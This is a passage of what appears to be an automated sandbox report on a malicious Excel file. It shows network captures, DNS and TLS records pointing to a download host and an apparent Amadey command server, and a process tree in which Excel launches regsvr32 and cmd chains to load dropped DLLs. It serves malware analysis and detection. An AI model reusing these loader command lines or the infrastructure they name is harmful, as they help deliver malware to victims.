                                                                                                                                                      Jun 9, 2021 15:21:55.561707973 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.561739922 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.561764956 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.561799049 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.561822891 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.606833935 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.743777037 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.743941069 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.744791031 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.920869112 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927237034 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927289009 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927320004 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927349091 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927350998 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927382946 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927383900 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927417994 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927438021 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927445889 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927464008 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927479029 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927501917 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927512884 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927524090 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927546024 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927555084 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927598953 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065057993 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065104961 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065144062 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065176010 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065207005 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065208912 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065237045 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065244913 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065280914 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065282106 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065314054 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065329075 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065345049 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065359116 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065376043 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065381050 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065402985 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065424919 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065438032 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065464973 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065469980 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065486908 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065514088 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.201870918 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.201898098 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.201925993 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.201947927 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.201966047 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.201992989 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202016115 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202018976 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202038050 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202069044 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202095032 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202202082 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202254057 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202256918 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202275038 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202299118 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202300072 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202317953 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202327013 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202344894 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202353001 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202367067 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202377081 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202392101 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202400923 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202421904 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202423096 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202439070 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202450037 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202466965 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202471018 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202486992 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202507973 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202548027 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202574015 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202599049 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202606916 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202637911 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.207607985 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.207724094 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338391066 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338424921 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338438988 CEST44349715107.180.50.232192.168.2.6

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jun 9, 2021 15:21:38.244496107 CEST6426753192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:38.294626951 CEST53642678.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:38.999614000 CEST4944853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:39.059832096 CEST53494488.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:39.159909964 CEST6034253192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:39.210349083 CEST53603428.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:40.534393072 CEST6134653192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:40.584779024 CEST53613468.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:42.137758970 CEST5177453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:42.198226929 CEST53517748.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:43.285564899 CEST5602353192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:43.346214056 CEST53560238.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:45.533961058 CEST5838453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:45.584702015 CEST53583848.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:49.907931089 CEST6026153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:49.958479881 CEST53602618.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:51.077616930 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:51.183701038 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:51.218998909 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:51.277750969 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:51.637789011 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:51.717477083 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:52.668123007 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:52.742284060 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:53.718720913 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:53.776930094 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.219571114 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:55.279922962 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.392092943 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:55.444571972 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.776357889 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:55.835069895 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.973902941 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:57.028814077 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:57.771101952 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:57.822587013 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:59.385391951 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:59.440799952 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:59.850233078 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:59.908941984 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:05.187127113 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:05.240174055 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:06.356194973 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:06.411145926 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:07.310992002 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:07.364352942 CEST53633078.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:08.822825909 CEST4969453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:08.872876883 CEST53496948.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:10.216510057 CEST5498253192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:10.277961016 CEST53549828.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:12.805483103 CEST5001053192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:12.879868031 CEST53500108.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:33.340646982 CEST6371853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:33.401187897 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:35.480846882 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:35.617012978 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:36.693973064 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:36.752301931 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:37.430131912 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:37.571043968 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:37.991182089 CEST6220853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:38.050961018 CEST53622088.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:38.482630014 CEST5757453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:38.550734043 CEST53575748.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:38.699526072 CEST5181853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:38.760968924 CEST53518188.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:39.343851089 CEST5662853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:39.405417919 CEST53566288.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:39.908086061 CEST6077853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:39.969800949 CEST53607788.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:40.793365002 CEST5379953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:40.852049112 CEST53537998.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:41.757324934 CEST5468353192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:41.818587065 CEST53546838.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:42.288892984 CEST5932953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:42.350413084 CEST53593298.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:50.255160093 CEST6402153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:50.318708897 CEST53640218.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:00.317203999 CEST5612953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:00.378262997 CEST53561298.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:16.410259008 CEST5817753192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:16.469381094 CEST53581778.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:34.410224915 CEST5070053192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:34.482976913 CEST53507008.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:35.993652105 CEST5406953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:36.063276052 CEST53540698.8.8.8192.168.2.6

                                                                                                                                                      ICMP Packets

                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                      Jun 9, 2021 15:22:05.833841085 CEST192.168.2.68.8.7.74d5aEcho
                                                                                                                                                      Jun 9, 2021 15:22:10.528872013 CEST192.168.2.68.8.7.74d59Echo
                                                                                                                                                      Jun 9, 2021 15:22:20.469414949 CEST192.168.2.68.8.7.74d58Echo
                                                                                                                                                      Jun 9, 2021 15:22:25.029455900 CEST192.168.2.68.8.7.74d57Echo
                                                                                                                                                      Jun 9, 2021 15:22:36.677659035 CEST192.168.2.68.8.7.74d56Echo
                                                                                                                                                      Jun 9, 2021 15:22:41.530548096 CEST192.168.2.68.8.7.74d55Echo

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Jun 9, 2021 15:21:55.219571114 CEST192.168.2.68.8.8.80x9318Standard query (0)tpfcu.comA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Jun 9, 2021 15:21:55.279922962 CEST8.8.8.8192.168.2.60x9318No error (0)tpfcu.com107.180.50.232A (IP address)IN (0x0001)

                                                                                                                                                      HTTPS Packets

                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                      Jun 9, 2021 15:21:55.561739922 CEST107.180.50.232443192.168.2.649715CN=tpfcu.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USFri Mar 05 15:44:31 CET 2021 Tue May 03 09:00:00 CEST 2011Wed Apr 06 16:44:31 CEST 2022 Sat May 03 09:00:00 CEST 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                      Jun 9, 2021 15:22:49.386614084 CEST18.117.84.120443192.168.2.649740CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATCN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATWed Jun 09 10:22:21 CEST 2021Thu Jun 09 10:22:21 CEST 2022771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,08916410db85077a5460817142dcbc8de
                                                                                                                                                      Jun 9, 2021 15:23:25.363224030 CEST18.117.84.120443192.168.2.649747CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATCN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATWed Jun 09 10:22:21 CEST 2021Thu Jun 09 10:22:21 CEST 2022771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,08916410db85077a5460817142dcbc8de
                                                                                                                                                      Jun 9, 2021 15:23:57.298791885 CEST18.117.84.120443192.168.2.649750CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATCN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATWed Jun 09 10:22:21 CEST 2021Thu Jun 09 10:22:21 CEST 2022771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,08916410db85077a5460817142dcbc8de

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: EXCEL.EXE PID: 6528 Parent PID: 792

                                                                                                                                                      General

                                                                                                                                                      Start time:15:21:49
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x10000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6796 Parent PID: 6528

                                                                                                                                                      General

                                                                                                                                                      Start time:15:21:55
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -s ..\iepfusn.dll
                                                                                                                                                      Imagebase:0xe50000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6848 Parent PID: 6796

                                                                                                                                                      General

                                                                                                                                                      Start time:15:21:56
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline: -s ..\iepfusn.dll
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: cmd.exe PID: 6980 Parent PID: 6848

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:03
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
                                                                                                                                                      Imagebase:0x7ff7180e0000
                                                                                                                                                      File size:273920 bytes
                                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: conhost.exe PID: 6988 Parent PID: 6980

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:04
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff61de10000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: PING.EXE PID: 7032 Parent PID: 6980

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:04
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:ping 8.8.7.7 -n 2
                                                                                                                                                      Imagebase:0x7ff612a90000
                                                                                                                                                      File size:21504 bytes
                                                                                                                                                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 5712 Parent PID: 6980

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:13
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: cmd.exe PID: 1724 Parent PID: 5712

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:17
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
                                                                                                                                                      Imagebase:0x7ff7180e0000
                                                                                                                                                      File size:273920 bytes
                                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: conhost.exe PID: 1808 Parent PID: 1724

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:18
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff61de10000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: PING.EXE PID: 6196 Parent PID: 1724

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:19
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:ping 8.8.7.7 -n 2
